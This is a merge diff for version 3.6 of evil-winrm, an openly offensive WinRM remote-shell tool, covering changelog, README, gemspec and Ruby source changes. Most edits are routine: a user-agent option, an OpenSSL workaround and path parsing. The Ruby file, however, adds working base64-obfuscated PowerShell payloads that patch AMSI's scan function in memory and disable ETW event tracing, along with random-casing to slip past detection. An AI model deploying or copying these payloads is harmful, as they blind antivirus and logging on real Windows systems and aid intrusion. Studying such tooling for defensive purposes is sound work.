Merge pull request #64 from Hackplayers/dev

Dev to master v3.6

CHANGELOG.md

@@ -1,3 +1,12 @@
+### 3.6
+ - Improvements of paths parsing
+ - Fixed bug downloading files without extension
+ - Replaced deprecated File.exists by File.exist function to avoid errors on newer Ruby versions
+ - Added user-agent option (Thanks gmkbenjamin)
+ - AMSI bypass refactor
+ - ETW bypasss added
+ - Fixed Donut-Loader feature
+
 ### 3.5
  - Improvements on powershell functions loading
  - Improvements on gemspec file and in ruby code using Rubocop (Thanks noraj)

CONTRIBUTING.md

@@ -10,7 +10,7 @@ Please note we have a [Code of Conduct], please follow it in all your interactio
 
 1. Direct push to [Master] is not allowed.
 2. Pull Requests to [Master] are not allowed.
-3. Usually, commits and pull requests should be done on [Dev] branch. If you have any doubt, don't hesitate to ask first.
+3. Usually, commits and pull requests should be done on [Dev] branch using the content of our [Dev] branch to avoid missing features not released yet. If you have any doubt, don't hesitate to ask first.
 4. Temporary branches may be existing for specific features, be pretty sure that the branch you are going to commit on is the right one. Ask first if you have any doubt.
 5. Any branch will be finally merged to [Dev], there it will be reviewed and tested deeply before being merged to [Master].
 6. All merges from [Dev] to [Master] are a new `evil-winrm` release. This merges to [Master] will be performed and reviewed exclusively by the staff.

README.md

@@ -38,6 +38,8 @@ protocol, it is using PSRP (Powershell Remoting Protocol) for initializing runsp
  - Optional logging feature
  - Docker support (prebuilt images available at [Dockerhub])
  - Trap capturing to avoid accidental shell exit on Ctrl+C
+ - Customizable user-agent using legitimate Windows default one
+ - ETW (Event Tracing for Windows) bypass
 
 ## Help
 ```
@@ -55,6 +57,7 @@ Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p P
     -p, --password PASS              Password
     -H, --hash HASH                  NTHash
     -P, --port PORT                  Remote host port (default 5985)
+    -a, --user-agent                 Specify connection user-agent (default Microsoft WinRM Client)
     -V, --version                    Show version
     -n, --no-colors                  Disable colors
     -N, --no-rpath-completion        Disable remote path completion
@@ -64,7 +67,7 @@ Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p P
 ```
 
 ## Requirements
-Ruby 2.3 or higher is needed. Some ruby gems are needed as well: `winrm >=2.3.2`, `winrm-fs >=1.3.2`, `stringio >=0.0.2`, `logger >= 1.4.3`, `fileutils >= 0.7.2`.
+Ruby 2.3 or higher is needed. Some ruby gems are needed as well: `winrm >=2.3.7`, `winrm-fs >=1.3.2`, `stringio >=0.0.2`, `logger >= 1.4.3`, `fileutils >= 0.7.2`.
 Depending of your installation method (4 availables) the installation of them could be required to be done manually.
 
 Another important requirement only used for Kerberos auth is to install the Kerberos package used for network authentication.
@@ -461,18 +464,53 @@ After that, you can launch safely your new installed ruby to use it on evil-winr
 It is recommended to use this new installed ruby only to launch evil-winrm. If you set it up as your default ruby for your system, bear in mind that it has no dependency gems installed. Some ruby based software like Metasploit or others could not start correctly due dependencies problems.
 
 ### Logging
-This feature will create files on your $HOME dir saving commands and the outputs of the WinRM sessions
+
+This feature will create files on your $HOME dir saving commands and the outputs of the WinRM sessions.
+
+### Known problems. OpenSSL errors
+
+Sometimes, you could face an error like this:
+
+```
+Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
+```
+
+The error is caused because the OpenSSL 3.0 version retired some legacy functions like MD4 which are needed to run this tool. There are different existing workarounds to deal with this situation:
+
+ - Update your system to the latest. Likely, this problem was automatically fixed on latest Ruby versions that are using newer OpenSSL versions.
+ - Compile your own Ruby using old OpenSSL 1.x instead of OpenSSL 3.0 or compile it using OpenSSL > 3.0 to avoid the problematic 3.0 version.
+ - The easiest one. Edit your `/etc/ssl/openssl.cnf` config file and be sure the config is like this:
+
+```
+openssl_conf = openssl_init
+
+[openssl_init]
+providers = provider_sect
+
+[provider_sect]
+default = default_sect
+legacy = legacy_sect
+
+[default_sect]
+activate = 1
+
+[legacy_sect]
+activate = 1
+```
+
+ - As an alternative for the last workaround, if your system is using LibreSSL instead of OpenSSL or maybe you just don't want to modify your system config file. Create a simple file containing the above content. Any name can be used, for example `evil-tls.conf`. After that, export an environment var to force the system to use it: `export OPENSSL_CONF="/path/to/evil-tls.conf"`. And then launch the tool, the error will disappear.
+
 
 ## Changelog:
 Changelog and project changes can be checked here: [CHANGELOG.md](https://raw.githubusercontent.com/Hackplayers/evil-winrm/master/CHANGELOG.md)
 
 ## Credits:
 Staff:
 
- - [Cybervaca], (founder). Twitter: [@CyberVaca_]
- - [OscarAkaElvis], Twitter: [@OscarAkaElvis]
- - [Jarilaos], Twitter: [@_Laox]
- - [arale61], Twitter: [@arale61]
+ - [Cybervaca], (founder). Twitter (X): [@CyberVaca_]
+ - [OscarAkaElvis], Twitter (X): [@OscarAkaElvis]
+ - [Jarilaos], Twitter (X): [@_Laox]
+ - [arale61], Twitter (X): [@arale61]
 
 Hat tip to:
 
@@ -523,8 +561,8 @@ Use it at your own servers and/or with the server owner's permission.
 [@arale61]: https://twitter.com/arale61
 
 <!-- Badges URLs -->
-[Version-shield]: https://img.shields.io/badge/version-3.5-blue.svg?style=flat-square&colorA=273133&colorB=0093ee "Latest version"
+[Version-shield]: https://img.shields.io/badge/version-3.6-blue.svg?style=flat-square&colorA=273133&colorB=0093ee "Latest version"
 [Ruby2.3-shield]: https://img.shields.io/badge/ruby-2.3%2B-blue.svg?style=flat-square&colorA=273133&colorB=ff0000 "Ruby 2.3 or later"
 [License-shield]: https://img.shields.io/badge/license-LGPL%20v3%2B-blue.svg?style=flat-square&colorA=273133&colorB=bd0000 "LGPL v3+"
-[Docker-shield]: https://img.shields.io/docker/cloud/automated/oscarakaelvis/evil-winrm.svg?style=flat-square&colorA=273133&colorB=a9a9a9 "Docker rules!"
+[Docker-shield]: https://img.shields.io/docker/automated/oscarakaelvis/evil-winrm.svg?style=flat-square&colorA=273133&colorB=a9a9a9 "Docker rules!"
 [Gem-Version]: https://badge.fury.io/rb/evil-winrm.svg "Ruby gem"

evil-winrm.gemspec

@@ -2,7 +2,7 @@
 
 Gem::Specification.new do |spec|
   spec.name = 'evil-winrm'
-  spec.version = '3.5'
+  spec.version = '3.6'
   spec.license = 'LGPL-3.0'
   spec.authors = %w[CyberVaca OscarAkaElvis Jarilaos Arale61]
   spec.email = ['[email protected]']
@@ -28,7 +28,7 @@ Gem::Specification.new do |spec|
   spec.add_dependency 'fileutils', '~> 1.0'
   spec.add_dependency 'logger',    '~> 1.4', '>= 1.4.3'
   spec.add_dependency 'stringio',  '~> 3.0'
-  spec.add_dependency 'winrm',     '~> 2.3', '>= 2.3.2'
+  spec.add_dependency 'winrm',     '~> 2.3', '>= 2.3.7'
   spec.add_dependency 'winrm-fs',  '~> 1.3', '>= 1.3.2'
 
   spec.add_development_dependency 'bundler', '~> 2.0'

evil-winrm.rb

@@ -17,11 +17,12 @@
 require 'time'
 require 'fileutils'
 require 'logger'
+require 'shellwords'
 
 # Constants
 
 # Version
-VERSION = '3.5'
+VERSION = '3.6'
 
 # Msg types
 TYPE_INFO = 0
@@ -56,6 +57,7 @@
 $url = 'wsman'
 $default_service = 'HTTP'
 $full_logging_path = "#{Dir.home}/evil-winrm-logs"
+$user_agent = "Microsoft WinRM Client"
 
 # Redefine download method from winrm-fs
 module WinRM
@@ -64,7 +66,7 @@ class FileManager
       def download(remote_path, local_path, chunk_size = 1024 * 1024, first = true, size: -1)
         @logger.debug("downloading: #{remote_path} -> #{local_path} #{chunk_size}")
         index = 0
-        return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(\*\.|\*\*|\.\*|\*)/)
+        return download_dir(remote_path, local_path, chunk_size, false) if remote_path.match?(/(\*\.?|\*\*|\.?\*|\*)/)
         output = _output_from_file(remote_path, chunk_size, index)
         return download_dir(remote_path, local_path, chunk_size, true) if output.exitcode == 2
         return false if output.exitcode >= 1
@@ -89,7 +91,7 @@ def download(remote_path, local_path, chunk_size = 1024 * 1024, first = true, si
       end
 
       def download_dir(remote_path, local_path, chunk_size, first)
-        index_exp = remote_path.index(/(\*\.|\*\*|\.\*|\*)/) || 0
+        index_exp = remote_path.index(/(\*\.?|\*\*|\.?\*|\*)/) || 0
         remote_file_path = remote_path
 
         if index_exp > 0
@@ -155,13 +157,16 @@ def completion_check
 
   # Arguments
   def arguments
-    options = { port: $port, url: $url, service: $service }
+    options = { port: $port, url: $url, service: $service, user_agent: $user_agent }
     optparse = OptionParser.new do |opts|
-      opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]'
+      opts.banner = 'Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-a USERAGENT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] [--spn SPN_PREFIX] [-l]'
       opts.on('-S', '--ssl', 'Enable ssl') do |_val|
         $ssl = true
         options[:port] = '5986'
       end
+      opts.on('-a', '--user-agent USERAGENT', 'Specify connection user-agent (default Microsoft WinRM Client)') do |val|
+        options[:user_agent] = val
+      end
       opts.on('-c', '--pub-key PUBLIC_KEY_PATH', 'Local path to public key certificate') do |val|
         options[:pub_key] = val
       end
@@ -253,6 +258,7 @@ def arguments
     $priv_key = options[:priv_key]
     $realm = options[:realm]
     $service = options[:service]
+    $user_agent = options[:user_agent]
     unless $log.nil?
 
       FileUtils.mkdir_p $full_logging_path
@@ -289,15 +295,17 @@ def connection_initialization
                   no_ssl_peer_verification: true,
                   transport: :ssl,
                   client_cert: $pub_key,
-                  client_key: $priv_key
+                  client_key: $priv_key,
+                  user_agent: $user_agent
                 )
               else
                 WinRM::Connection.new(
                   endpoint: "https://#{$host}:#{$port}/#{$url}",
                   user: $user,
                   password: $password,
                   no_ssl_peer_verification: true,
-                  transport: :ssl
+                  transport: :ssl,
+                  user_agent: $user_agent
                 )
               end
 
@@ -308,14 +316,16 @@ def connection_initialization
         password: '',
         transport: :kerberos,
         realm: $realm,
-        service: $service
+        service: $service,
+        user_agent: $user_agent
       )
     else
       $conn = WinRM::Connection.new(
         endpoint: "http://#{$host}:#{$port}/#{$url}",
         user: $user,
         password: $password,
-        no_ssl_peer_verification: true
+        no_ssl_peer_verification: true,
+        user_agent: $user_agent
       )
     end
   end
@@ -379,10 +389,10 @@ def check_ssl(pub_key, priv_key)
     priv_key = priv_key.to_s
     if $ssl
       unless pub_key.empty? && priv_key.empty? then
-        unless [pub_key, priv_key].all? {|f| File.exists?(f) } then
-          print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exists?(pub_key)
+        unless [pub_key, priv_key].all? {|f| File.exist?(f) } then
+          print_message("Path to provided public certificate file \"#{pub_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(pub_key)
 
-          print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exists?(priv_key)
+          print_message("Path to provided private certificate file \"#{priv_key}\" can't be found. Check filename or path", TYPE_ERROR, true, $logger) unless File.exist?(priv_key)
 
           custom_exit(1)
         end
@@ -678,6 +688,7 @@ def main
                 dest = ""
                 source = ""
                 paths = get_paths_from_command(command, pwd)
+
                 if paths.length == 2
                   dest = paths.pop
                   source = paths.pop
@@ -759,6 +770,8 @@ def main
                     load_executable = File.binread(load_executable)
                     load_executable = Base64.strict_encode64(load_executable)
                     output = shell.run("Donut-Loader -process_id #{pid} -donutfile #{load_executable}")
+                else
+                    output = shell.run("Donut-Loader")
                 end
                 print(output.output)
                 $logger&.info(output.output)
@@ -908,7 +921,7 @@ def generate_random_type_string
   end
 
   def get_Bypass_4MSI
-    bypass_template = 'JGNvZGUgPSBAIgp1c2luZyBTeXN0ZW07CnVzaW5nIFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlczsKcHVibGljIGNsYXNzIGNvZGUgewogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBHZXRQcm9jQWRkcmVzcyhJbnRQdHIgaE1vZHVsZSwgc3RyaW5nIHByb2NOYW1lKTsKICAgIFtEbGxJbXBvcnQoImtlcm5lbDMyIildCiAgICBwdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgTG9hZExpYnJhcnkoc3RyaW5nIG5hbWUpOwogICAgW0RsbEltcG9ydCgia2VybmVsMzIiKV0KICAgIHB1YmxpYyBzdGF0aWMgZXh0ZXJuIGJvb2wgVmlydHVhbFByb3RlY3QoSW50UHRyIGxwQWRkcmVzcywgVUludFB0ciBydW9xeHAsIHVpbnQgZmxOZXdQcm90ZWN0LCBvdXQgdWludCBscGZsT2xkUHJvdGVjdCk7Cn0KIkAKQWRkLVR5cGUgJGNvZGUKJGZqdGZxd24gPSBbY29kZV06OkxvYWRMaWJyYXJ5KCJhbXNpLmRsbCIpCiNqdW1wCiRqeXV5amcgPSBbY29kZV06OkdldFByb2NBZGRyZXNzKCRmanRmcXduLCAiIiskdmFyMSsiIikKJHAgPSAwCiNqdW1wCiRudWxsID0gW2NvZGVdOjpWaXJ0dWFsUHJvdGVjdCgkanl1eWpnLCBbdWludDMyXTUsIDB4NDAsIFtyZWZdJHApCiRmbnh5ID0gIjB4QjgiCiRmbXh5ID0gIjB4NTciCiRld2FxID0gIjB4MDAiCiR3ZnRjID0gIjB4MDciCiRuZHVnID0gIjB4ODAiCiRobXp4ID0gIjB4QzMiCiNqdW1wCiRsbGZhbSA9IFtCeXRlW11dICgkZm54eSwkZm14eSwkZXdhcSwkd2Z0YywrJG5kdWcsKyRobXp4KQokbnVsbCA9IFtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkNvcHkoJGxsZmFtLCAwLCAkanl1eWpnLCA2KSA='
+    bypass_template = 'ZnVuY3Rpb24gTG9va3VwRnVuYyB7CiAgICBQYXJhbSAoJG1vZHVsZU5hbWUsICRmdW5jdGlvbk5hbWUpCiAgICAkYXNzZW0gPSAoW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uR2V0QXNzZW1ibGllcygpIHwKICAgIFdoZXJlLU9iamVjdCB7ICRfLkdsb2JhbEFzc2VtYmx5Q2FjaGUgLUFuZCAkXy5Mb2NhdGlvbi5TcGxpdCgnXFwnKVstMV0uCiAgICAgRXF1YWxzKCdTeXN0ZW0uZGxsJykKICAgICB9KS5HZXRUeXBlKCdNaWNyb3NvZnQuV2luMzIuVW5zYWZlTmF0aXZlTWV0aG9kcycpCiAgICAkdG1wPUAoKQogICAgJGFzc2VtLkdldE1ldGhvZHMoKSB8IEZvckVhY2gtT2JqZWN0IHtJZigkXy5OYW1lIC1saWtlICJHZSpQKm9jKmRkcmVzcyIpIHskdG1wKz0kX319CiAgICByZXR1cm4gJHRtcFswXS5JbnZva2UoJG51bGwsIEAoKCRhc3NlbS5HZXRNZXRob2QoJ0dldE1vZHVsZUhhbmRsZScpKS5JbnZva2UoJG51bGwsCkAoJG1vZHVsZU5hbWUpKSwgJGZ1bmN0aW9uTmFtZSkpCn0KI2p1bXAKCmZ1bmN0aW9uIGdldERlbGVnYXRlVHlwZSB7CiAgICBQYXJhbSAoCiAgICAgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDAsIE1hbmRhdG9yeSA9ICRUcnVlKV0gW1R5cGVbXV0KICAgICAkZnVuYywgW1BhcmFtZXRlcihQb3NpdGlvbiA9IDEpXSBbVHlwZV0gJGRlbFR5cGUgPSBbVm9pZF0KICAgICkKICAgICR0eXBlID0gW0FwcERvbWFpbl06OkN1cnJlbnREb21haW4uCiAgICBEZWZpbmVEeW5hbWljQXNzZW1ibHkoKE5ldy1PYmplY3QgU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHlOYW1lKCdSZWZsZWN0ZWREZWxlZ2F0ZScpKSwKW1N5c3RlbS5SZWZsZWN0aW9uLkVtaXQuQXNzZW1ibHlCdWlsZGVyQWNjZXNzXTo6UnVuKS4KICAgIERlZmluZUR5bmFtaWNNb2R1bGUoJ0luTWVtb3J5TW9kdWxlJywgJGZhbHNlKS4KICAgIERlZmluZVR5cGUoJ015RGVsZWdhdGVUeXBlJywgJ0NsYXNzLCBQdWJsaWMsIFNlYWxlZCwgQW5zaUNsYXNzLAogICAgQXV0b0NsYXNzJywgW1N5c3RlbS5NdWx0aWNhc3REZWxlZ2F0ZV0pCgogICR0eXBlLgogICAgRGVmaW5lQ29uc3RydWN0b3IoJ1JUU3BlY2lhbE5hbWUsIEhpZGVCeVNpZywgUHVibGljJywKW1N5c3RlbS5SZWZsZWN0aW9uLkNhbGxpbmdDb252ZW50aW9uc106OlN0YW5kYXJkLCAkZnVuYykuCiAgICAgU2V0SW1wbGVtZW50YXRpb25GbGFncygnUnVudGltZSwgTWFuYWdlZCcpCgogICR0eXBlLgogICAgRGVmaW5lTWV0aG9kKCdJbnZva2UnLCAnUHVibGljLCBIaWRlQnlTaWcsIE5ld1Nsb3QsIFZpcnR1YWwnLCAkZGVsVHlwZSwKJGZ1bmMpLiBTZXRJbXBsZW1lbnRhdGlvbkZsYWdzKCdSdW50aW1lLCBNYW5hZ2VkJykKICAgIHJldHVybiAkdHlwZS5DcmVhdGVUeXBlKCkKfQojanVtcAoKJGE9IkEiCiRiPSJtc2lTIgokYz0iY2FuQiIKJGQ9InVmZmVyIgojanVtcApbSW50UHRyXSRmdW5jQWRkciA9IExvb2t1cEZ1bmMgYW1zaS5kbGwgKCRhKyRiKyRjKyRkKQojanVtcAokb2xkUHJvdGVjdGlvbkJ1ZmZlciA9IDAKI2p1bXAKJHZwPVtTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMuTWFyc2hhbF06OkdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyKChMb29rdXBGdW5jIGtlcm5lbDMyLmRsbCBWaXJ0dWFsUHJvdGVjdCksIChnZXREZWxlZ2F0ZVR5cGUgQChbSW50UHRyXSwgW1VJbnQzMl0sIFtVSW50MzJdLCBbVUludDMyXS5NYWtlQnlSZWZUeXBlKCkpIChbQm9vbF0pKSkKI2p1bXAKJGEgPSAkdnAuSW52b2tlKCRmdW5jQWRkciwgMywgMHg0MCwgW3JlZl0kb2xkUHJvdGVjdGlvbkJ1ZmZlcikKI2p1bXAKJGJ1ZiA9IFtCeXRlW11dICgweGI4LDB4MzQsMHgxMiwweDA3LDB4ODAsMHg2NiwweGI4LDB4MzIsMHgwMCwweGIwLDB4NTcsMHhjMykKI2p1bXAKJGEgPSBbU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzLk1hcnNoYWxdOjpDb3B5KCRidWYsIDAsICRmdW5jQWRkciwgMTIpCiNqdW1wClJlbW92ZS1JdGVtIEZ1bmN0aW9uOmdldERlbGVnYXRlVHlwZQojanVtcApSZW1vdmUtSXRlbSBGdW5jdGlvbjpMb29rdXBGdW5jCgo='
     dec_template = Base64.decode64(bypass_template)
     result = dec_template.gsub('$var1', generate_random_type_string)
     @bypass_amsi_words_random_case.each { |w| result.gsub!(w.to_s, random_case(w)) }
@@ -927,6 +940,12 @@ def load_Bypass_4MSI(shell)
     output = shell.run(bypass)
     if output.output.empty?
       print_message('[+] Success!', TYPE_SUCCESS, false)
+      print_message('Patching ETW, please be patient ..', TYPE_INFO, true)
+      patch_etw = Base64.decode64("W1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkV2l0aFBhcnRpYWxOYW1lKCdTeXN0ZW0uQ29yZScpLkdldFR5cGUoJ1N5c3RlbS5EaWFnbm9zdGljcy5FdmVudGluZy5FdmVudFByb3ZpZGVyJykuR2V0RmllbGQoJ21fZW5hYmxlZCcsJ05vblB1YmxpYyxJbnN0YW5jZScpLlNldFZhbHVlKFtSZWZdLkFzc2VtYmx5LkdldFR5cGUoJ1N5c3RlbS5NYW5hZ2VtZW50LkF1dG9tYXRpb24uVHJhY2luZy5QU0V0d0xvZ1Byb3ZpZGVyJykuR2V0RmllbGQoJ2V0d1Byb3ZpZGVyJywnTm9uUHVibGljLFN0YXRpYycpLkdldFZhbHVlKCksMCkK")
+      output = shell.run(patch_etw)
+      print_message('[+] Success!', TYPE_SUCCESS, false)
+      output = shell.run("Remove-Item Function:getDelegateType")
+      output = shell.run ("Remove-Item Function:LookupFunc")
     else
       puts(output.output)
     end
@@ -939,9 +958,8 @@ def extract_filename(path)
   end
 
   def get_paths_from_command(command, pwd)
-    parts = command.split
+    parts = Shellwords.shellsplit(command)
     parts.delete_at(0)
-    parts.each { |p| p.gsub!('"', '') }
     return parts
   end